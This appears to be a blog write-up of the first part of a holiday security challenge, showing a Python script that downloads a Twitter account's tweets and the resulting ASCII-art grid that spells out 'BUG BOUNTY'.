Introduction

Every year, the folks at Counter Hack Challenges run a cyber security challenge for people to enjoy over the festive season, and this year it’s a corker.

Head over to the challenge site to set the scene, have a look at the questions, and have a go for yourself before reading my solution below!

Part 1: A Most Curious Business Card

First, we examine Santa’s business card to see if it contains any clues which might help us get started on our adventure. We see a Twitter handle of @santawclaus and a similar Instagram handle of santawclaus.

center business card

A glance at the Twitter stream at first seems like Santa has been spouting gobbledygook, but perhaps there is a hidden message? We use the following python script to pull all the tweets for further analysis.

from HTMLParser import HTMLParser
from twitter import *

access_key = "ACCESS_KEY_HERE"
access_secret = "ACCESS_SECRET_HERE"
consumer_key = "CONSUMER_KEY_HERE"
consumer_secret = "CONSUMER_SECRET_HERE"

twitter = Twitter(auth = OAuth(access_key,
                               access_secret,
                               consumer_key,
                               consumer_secret))

user = "santawclaus"
statuses = []
max_id = 798175529463676928
html_parser = HTMLParser()

while True:
    results = twitter.statuses.user_timeline(screen_name = user,
                                             count = 200,
                                             max_id = max_id)

    if len(results) == 0:
       break

    statuses += [html_parser.unescape(x['text']) for x in results]

    max_id = min([x['id'] for x in results]) - 1


for status in statuses:
    print status

and the hidden message of BUG BOUNTY becomes plain as day:

SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ
JOYPEACEONEARTHELFf.......)[email protected]??'.......]SANTAPEACEONEARTHHOHOHOQ
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ
CHRISTMASHOHOHOELFQQ...............dQ,..........<GOODWILLTOWARDSMENHOHOHOQQ
GOODWILLTOWARDSMENQQL.............<QQm,........_HOHOHOHOHOHOCHRISTMASELFELF
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ
SANTACHRISTMASCHRISTMASJOYWP"`.........-"9NORTHPOLEPEACEONEARTHCHRISTMASELF
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ
[email protected]'..................."$CHRISTMASELFSANTANORTHPOLEELF
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN
[email protected]`.........................-QWPEACEONEARTHPEACEONEARTHQ
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ
CHRISTMASSANTAELFQ[........<HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....<SANTAHOHOHONORTHPOLEELFSANTA
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ
SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY
JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF
NORTHPOLEJOYELFJOYf.......)[email protected]??'.......]CHRISTMASPEACEONEARTHJOY
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ
CHRISTMASHOHOHOJOYQm...............dQ,..........<GOODWILLTOWARDSMENQWSANTAQ
SANTACHRISTMASSANTAQL.............<QQm,........_JOYELFGOODWILLTOWARDSMENELF
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY
HOHOHOPEACEONEARTHELFJOYJOYQV?"~....--"?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ
GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF
PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO
[email protected]:NORTHPOLEELFQWSANTASANTA
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......<HOHOHOSANTANORTHPOLEQQWQ
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO
CHRISTMASCHRISTMASL........."HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO
GOODWILLTOWARDSMENm............"!???!"`...........NORTHPOLEHOHOHOWJOYQWELFQ
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ
SANTAPEACEONEARTHJOY/...........................<NORTHPOLECHRISTMASHOHOHOQQ
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ
CHRISTMASJOYSANTANORTHPOLEV?"-....................]GOODWILLTOWARDSMENQWJOYQ
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO
PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMEN[.........-"????????????????????4ELFCHRISTMASHOHOHOQQWELF
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF
SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ
JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO
CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ
JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO
SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF
[email protected]'.............sPEACEONEARTHELFWCHRISTMAS
GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ
[email protected]'.............sQWGOODWILLTOWARDSMENJOYJOYQQ
NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ
[email protected]'.............aWCHRISTMASELFPEACEONEARTHQQWELF
SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY
[email protected]'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF
SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ
PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO
HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ
JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ
NORTHPOLEJOYHOHOHOF.............."????????????????4PEACEONEARTHQQWHOHOHOELF
HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ
HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH
JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF
GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY
NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF
ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ
HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ
PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY
JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY
ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ
HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ
CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ
HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF
